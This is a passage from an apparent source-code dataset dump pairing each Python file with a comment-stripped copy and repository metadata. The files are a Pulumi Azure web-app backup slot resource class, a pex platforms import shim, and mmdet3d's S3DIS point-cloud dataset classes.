alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
"""
Get an existing WebAppBackupConfigurationSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the backup.
"""
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
"""
Schedule for the backup if it is executed periodically.
"""
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
"""
Databases included in the backup.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
"""
SAS URL to the container.
"""
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 45.650794
| 779
| 0.659944
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
'azure-nextgen:web:WebAppBackupConfigurationSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppBackupConfigurationSlot':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppBackupConfigurationSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "backup_name")
@property
@pulumi.getter(name="backupSchedule")
def backup_schedule(self) -> pulumi.Output[Optional['outputs.BackupScheduleResponse']]:
return pulumi.get(self, "backup_schedule")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseBackupSettingResponse']]]:
return pulumi.get(self, "databases")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="storageAccountUrl")
def storage_account_url(self) -> pulumi.Output[str]:
return pulumi.get(self, "storage_account_url")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| true
| true
|
f70b5c717242fedb522fc7d4cd4831e8513391c1
| 67
|
py
|
Python
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 1,143
|
2015-01-05T04:19:24.000Z
|
2019-12-11T12:02:23.000Z
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 144
|
2015-01-06T05:05:07.000Z
|
2019-12-12T18:02:37.000Z
|
src/python/twitter/common/python/platforms.py
|
zhouyijiaren/commons
|
10df6fb63547baa9047782aa7ad4edf354914b10
|
[
"Apache-2.0"
] | 426
|
2015-01-08T08:33:41.000Z
|
2019-12-09T13:15:40.000Z
|
from __future__ import absolute_import
from pex.platforms import *
| 22.333333
| 38
| 0.850746
|
from __future__ import absolute_import
from pex.platforms import *
| true
| true
|
f70b5e01e475801f3975fd465b2281a400b36fda
| 18,438
|
py
|
Python
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 95
|
2021-12-01T07:32:48.000Z
|
2022-03-11T07:12:32.000Z
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 15
|
2021-12-03T09:56:17.000Z
|
2022-03-07T13:01:12.000Z
|
mmdet3d/datasets/s3dis_dataset.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 21
|
2021-12-02T11:07:55.000Z
|
2022-03-28T15:25:02.000Z
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
"""S3DIS Dataset for Detection Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one. The one for
test is Area_5 as suggested in `GSDN <https://arxiv.org/abs/2006.12356>`_.
To concatenate 5 areas during training
`mmdet.datasets.dataset_wrappers.ConcatDataset` should be used.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
to its original format then converted them to `box_type_3d`.
Defaults to 'Depth' in this dataset. Available options includes
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
"""
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`DepthInstance3DBoxes`): \
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- pts_instance_mask_path (str): Path of instance masks.
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
np.float32) # k, 6
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
# to target box structure
gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data \
preprocessing pipelines. It includes the following keys:
- pts_filename (str): Filename of point clouds.
- file_name (str): Filename of point clouds.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
class _S3DISSegDataset(Custom3DSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class is the inner dataset for S3DIS. Since S3DIS has 6 areas, we
often train on 5 of them and test on the remaining one.
However, there is not a fixed train-test split of S3DIS. People often test
on Area_5 as suggested by `SEGCloud <https://arxiv.org/abs/1710.07563>`_.
But many papers also report the average results of 6-fold cross validation
over the 6 areas (e.g. `DGCNN <https://arxiv.org/abs/1801.07829>`_).
Therefore, we use an inner dataset for one area, and further use a dataset
wrapper to concat all the provided data in different areas.
Args:
data_root (str): Path of dataset root.
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (np.ndarray | str, optional): Precomputed index to load
data. For scenes with many points, we may sample it several times.
Defaults to None.
"""
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14)) # possibly with 'stair' class
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: annotation information consists of the following keys:
- pts_semantic_mask_path (str): Path of semantic masks.
"""
# Use index to get the annos, thus the evalhook could also use this api
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Visualize the results online.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
"""Compute scene_idxs for data sampling.
We sample more times for scenes with more points.
"""
# when testing, we load one whole scene every time
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
r"""S3DIS Dataset for Semantic Segmentation Task.
This class serves as the API for experiments on the S3DIS Dataset.
It wraps the provided datasets of different areas.
We don't use `mmdet.datasets.dataset_wrappers.ConcatDataset` because we
need to concat the `scene_idxs` of different areas.
Please refer to the `google form <https://docs.google.com/forms/d/e/1FAIpQL
ScDimvNMCGhy_rmBA2gHfDu3naktRm6A8BPwAWWDv-Uhm6Shw/viewform?c=0&w=1>`_ for
data downloading.
Args:
data_root (str): Path of dataset root.
ann_files (list[str]): Path of several annotation files.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
palette (list[list[int]], optional): The palette of segmentation map.
Defaults to None.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
ignore_index (int, optional): The label index to be ignored, e.g. \
unannotated points. If None is given, set to len(self.CLASSES).
Defaults to None.
scene_idxs (list[np.ndarray] | list[str], optional): Precomputed index
to load data. For scenes with many points, we may sample it several
times. Defaults to None.
"""
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
# make sure that ann_files and scene_idxs have same length
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
# initialize some attributes as datasets[0]
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
# data_infos and scene_idxs need to be concat
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
"""Concat data_infos from several datasets to form self.data_infos.
Args:
data_infos (list[list[dict]])
"""
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
"""Concat scene_idxs from several datasets to form self.scene_idxs.
Needs to manually add offset to scene_idxs[1, 2, ...].
Args:
scene_idxs (list[np.ndarray])
"""
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
@staticmethod
def _duplicate_to_list(x, num):
"""Repeat x `num` times to form a list."""
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
"""Make ann_files as list/tuple."""
# ann_file could be str
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
"""Make scene_idxs as list/tuple."""
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
# scene_idx could be str, np.ndarray, list or tuple
if isinstance(scene_idx, str): # str
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str): # list of str
return scene_idx
if isinstance(scene_idx[0], (list, tuple, np.ndarray)): # list of idx
return scene_idx
# single idx
return self._duplicate_to_list(scene_idx, num)
| 39.822894
| 83
| 0.594533
|
import numpy as np
from os import path as osp
from mmdet3d.core import show_result, show_seg_result
from mmdet3d.core.bbox import DepthInstance3DBoxes
from mmdet.datasets import DATASETS
from mmseg.datasets import DATASETS as SEG_DATASETS
from .custom_3d import Custom3DDataset
from .custom_3d_seg import Custom3DSegDataset
from .pipelines import Compose
@DATASETS.register_module()
class S3DISDataset(Custom3DDataset):
CLASSES = ('table', 'chair', 'sofa', 'bookcase', 'board')
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
modality=None,
box_type_3d='Depth',
filter_empty_gt=True,
test_mode=False):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
def get_ann_info(self, index):
info = self.data_infos[index]
if info['annos']['gt_num'] != 0:
gt_bboxes_3d = info['annos']['gt_boxes_upright_depth'].astype(
np.float32)
gt_labels_3d = info['annos']['class'].astype(np.long)
else:
gt_bboxes_3d = np.zeros((0, 6), dtype=np.float32)
gt_labels_3d = np.zeros((0, ), dtype=np.long)
gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
class _S3DISSegDataset(Custom3DSegDataset):
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14))
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
@staticmethod
def _duplicate_to_list(x, num):
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx, str):
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str):
return scene_idx
